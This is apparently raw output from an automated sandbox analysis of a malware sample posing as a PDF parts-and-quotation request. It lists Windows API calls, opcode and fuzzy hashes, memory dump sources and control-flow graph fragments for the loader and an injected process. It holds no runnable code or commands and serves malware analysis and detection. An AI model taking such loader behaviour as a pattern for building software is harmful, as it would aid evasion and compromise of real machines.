                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                  • String ID:
                                                                  • API String ID: 920484758-0
                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction ID: 5498a9ee87043218917ef4cf245f605fca283c963b29ffa9f6e90cdb6b69b635
                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction Fuzzy Hash: 6D410C75B0062D9FCB65DB58CC90BD9B7BDAF88304F0041E5EA49E7251DA31AF808F61
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 1147e45abeeeeda11d6d46c80ad1919919efe11a5b41d297225db1090176a5a9
                                                                  • Instruction ID: b6043f30404d6e2ed21ee58db11ce94eb95c377b6afd3dc6c481d4fc2f7d49ec
                                                                  • Opcode Fuzzy Hash: 1147e45abeeeeda11d6d46c80ad1919919efe11a5b41d297225db1090176a5a9
                                                                  • Instruction Fuzzy Hash: 55412C70B002689BDB61EB68CC84BDAB7FDAF48300F4045E6AA48E7251DB759F84CF54
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0295ACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0295AD05
                                                                  • GetModuleFileNameA.KERNEL32(02950000,?,00000105), ref: 0295AD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0295ADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 48af0c44f8ecbfd0fd0c917d68947706e13d6a2efec892032b3d4a69eb400b4a
                                                                  • Instruction ID: 2de2a95efcd8a985929f33a0de7bf79e5cc006befe57cd49ac63155ac72c6f05
                                                                  • Opcode Fuzzy Hash: 48af0c44f8ecbfd0fd0c917d68947706e13d6a2efec892032b3d4a69eb400b4a
                                                                  • Instruction Fuzzy Hash: CD413A70B002689BDB61EB68CC84BDAB7FDAF48300F4041E5AA48E7251DB759F88CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12e54c2e459c6e44b6bc5a48e3514c02d17b7c474ac1d812e8e6a81076458575
                                                                  • Instruction ID: f09637e0f4414ce7135852f9db9a6230ae64640c7be56490371931a5ab042733
                                                                  • Opcode Fuzzy Hash: 12e54c2e459c6e44b6bc5a48e3514c02d17b7c474ac1d812e8e6a81076458575
                                                                  • Instruction Fuzzy Hash: 15A1E5667106200BE718EA7C9C843BDB3C6DFC4225F18467EED1DCB391EB68C9468790
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02959562), ref: 029594FA
                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02959562), ref: 02959500
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DateFormatLocaleThread
                                                                  • String ID: yyyy
                                                                  • API String ID: 3303714858-3145165042
                                                                  • Opcode ID: 5a5b76f7c7397bef40285cddf3fb583d3487cd0239d5076f93b99caad50bef22
                                                                  • Instruction ID: 17c07325cfc78e29a9ba3fb11c6261ab5abaff5c0f0a01f7083058251cf100f9
                                                                  • Opcode Fuzzy Hash: 5a5b76f7c7397bef40285cddf3fb583d3487cd0239d5076f93b99caad50bef22
                                                                  • Instruction Fuzzy Hash: 1B218D75B04238DFEB51DFA8C881AAEB3F9EF88710F5100A5ED09E7240D6309E51CBA1
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02968216), ref: 029681F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                  • API String ID: 3811539418-184458249
                                                                  • Opcode ID: 90af2a94f5e8cbce37e0ebea2978ea17b220c1581b6a8d94964cf8aa3a16d133
                                                                  • Instruction ID: 1c6bc935148bde587bc9da5cb3a0ea501620258571be05393824be08d3db4b65
                                                                  • Opcode Fuzzy Hash: 90af2a94f5e8cbce37e0ebea2978ea17b220c1581b6a8d94964cf8aa3a16d133
                                                                  • Instruction Fuzzy Hash: A701AD34784304AFEB01EFA4DC65F6E37EDFB88B00F614820BA08D3640E634AD048B28
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AD98
                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 0296ADC8
                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 0296ADE7
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296ADF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Read$Write
                                                                  • String ID:
                                                                  • API String ID: 3448952669-0
                                                                  • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction ID: 959cbe57e4609db7f415e8403951481014f07a9b0b7d2f8160346b098aad792d
                                                                  • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction Fuzzy Hash: F32181B1A412199BDB10DF69CC94BAE77F9FF84362F408112EE50A7340EB34E911DBA4

                                                                  Execution Graph

                                                                  Execution Coverage:0.9%
                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:133
                                                                  Total number of Limit Nodes:14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000001.1400986330.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_1_400000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                  • API String ID: 0-3667867154
                                                                  • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                  • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 92 417b33-417b4f 93 417b57-417b5c 92->93 94 417b52 call 42f7c3 92->94 95 417b62-417b70 call 42fdc3 93->95 96 417b5e-417b61 93->96 94->93 99 417b80-417b91 call 42e263 95->99 100 417b72-417b7d call 430063 95->100 105 417b93-417ba7 LdrLoadDll 99->105 106 417baa-417bad 99->106 100->99 105->106
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                  • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 130 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                  • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 145 2ce12c70-2ce12c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 182ad5ebd333f2595a9264aa19fda1354a2799ea7d54ac5dae5746a7433254a7
                                                                  • Instruction ID: 51563348edf9427f8c8f954409dc49371244d3971d3419dbe15346b2fd6ffa49
                                                                  • Opcode Fuzzy Hash: 182ad5ebd333f2595a9264aa19fda1354a2799ea7d54ac5dae5746a7433254a7
                                                                  • Instruction Fuzzy Hash: B090027220198802D2607158844674A00054BD0301F59C411A4524618D8A95C9917122

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 2ce12df0-2ce12dfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: d4476cf794710469fd0f59d03c0e65073cc13130bf66bbdde6591ac3a1cf6814
                                                                  • Instruction ID: d15fbe826422809f327e8ef2e940510a51e6e92e7746d645e1626ff1098ac2f2
                                                                  • Opcode Fuzzy Hash: d4476cf794710469fd0f59d03c0e65073cc13130bf66bbdde6591ac3a1cf6814
                                                                  • Instruction Fuzzy Hash: 5F90027220190413D2617158454670700094BD0241F95C412A0524518D9A56CA52A122

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 2ce12b60-2ce12b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f515dcbd623553ab96189e9f63227cf2880c232925b22442dcc029e45fee1725
                                                                  • Instruction ID: bdca0e2d6cee5c8ac63c730d5250ca78c064665a4a10718106f98e6d1da71daf
                                                                  • Opcode Fuzzy Hash: f515dcbd623553ab96189e9f63227cf2880c232925b22442dcc029e45fee1725
                                                                  • Instruction Fuzzy Hash: 0E9002B220290003425571584456716400A4BE0201B55C021E1114550DC925C9916126
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 353de8f2b76b0402d25e479dc8431d8da2accbeb7fbc6a2c94298b4779fa9733
                                                                  • Instruction ID: 215965ae3a9272cc8b80aae56b51a126fc5117074cd16bf7c3e5e73620cf5f1b
                                                                  • Opcode Fuzzy Hash: 353de8f2b76b0402d25e479dc8431d8da2accbeb7fbc6a2c94298b4779fa9733
                                                                  • Instruction Fuzzy Hash: D0900272605A0402D2507158455670610054BD0201F65C411A0524528D8B95CA5165A3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 401af2-401b18 1 401b20-401b33 0->1 1->1 2 401b35-401b51 call 4010e0 1->2 5 401b56-401b5c 2->5 5->5 6 401b5e-401b82 call 401d70 5->6 9 401b87-401b8d 6->9 9->9 10 401b8f-401b9e 9->10 11 401ba3-401ba4 10->11 11->11 12 401ba6-401bab 11->12 13 401bb0-401bc1 12->13 13->13 14 401bc3-401bd8 13->14 14->14 15 401bda-401bdf 14->15 16 401be0-401bf1 15->16 16->16 17 401bf3-401c19 EntryPoint 16->17 18 401c20-401c26 17->18 18->18 19 401c28 call 430153 18->19 20 401c2a-401c2d 19->20 21 401c32-401c45 20->21 21->21 22 401c47-401c4c 21->22 23 401c50-401c61 22->23 23->23 24 401c63-401c78 23->24
                                                                  APIs
                                                                  • EntryPoint.KMTQWSSC(?,0000032C,?), ref: 00401BFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EntryPoint
                                                                  • String ID: a```
                                                                  • API String ID: 3225343992-3259403941
                                                                  • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                  • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 26 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: whA
                                                                  • API String ID: 3298025750-33568622
                                                                  • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                  • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 70 417bb3-417bc4 71 417b81-417b83 70->71 72 417bc6-417bd3 70->72 75 417b89-417b91 71->75 76 417b84 call 42e263 71->76 73 417bd5-417bd6 72->73 74 417bd7-417bde 72->74 73->74 79 417be1-417be7 74->79 77 417b93-417ba7 LdrLoadDll 75->77 78 417baa-417bad 75->78 76->75 77->78 80 417be9 79->80 81 417bed-417bf5 79->81 82 417bea 80->82 83 417c5f-417c64 80->83 84 417bfa-417c03 81->84 82->84 87 417beb-417bec 82->87 85 417c41-417c55 83->85 86 417c66-417c6f 83->86 84->85 85->79 90 417c57-417c58 85->90 89 417c71-417c91 86->89 87->81 90->89 91 417c5a-417c5e 90->91 91->83
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                  • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 417b27-417b30 108 417b90-417ba7 LdrLoadDll 107->108 109 417b32-417b5c call 42f7c3 107->109 110 417baa-417bad 108->110 114 417b62-417b70 call 42fdc3 109->114 115 417b5e-417b61 109->115 118 417b80-417b91 call 42e263 114->118 119 417b72-417b7d call 430063 114->119 118->110 124 417b93-417ba7 LdrLoadDll 118->124 119->118 124->110
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                  • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 125 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                  • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 135 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                  • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 140 2ce12c0a-2ce12c0f 141 2ce12c11-2ce12c18 140->141 142 2ce12c1f-2ce12c26 LdrInitializeThunk 140->142
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1f0ef4f3446b4a6ff0de7ebf802db40e72720ffdeedc1b57e1c63ac2d66fbaa
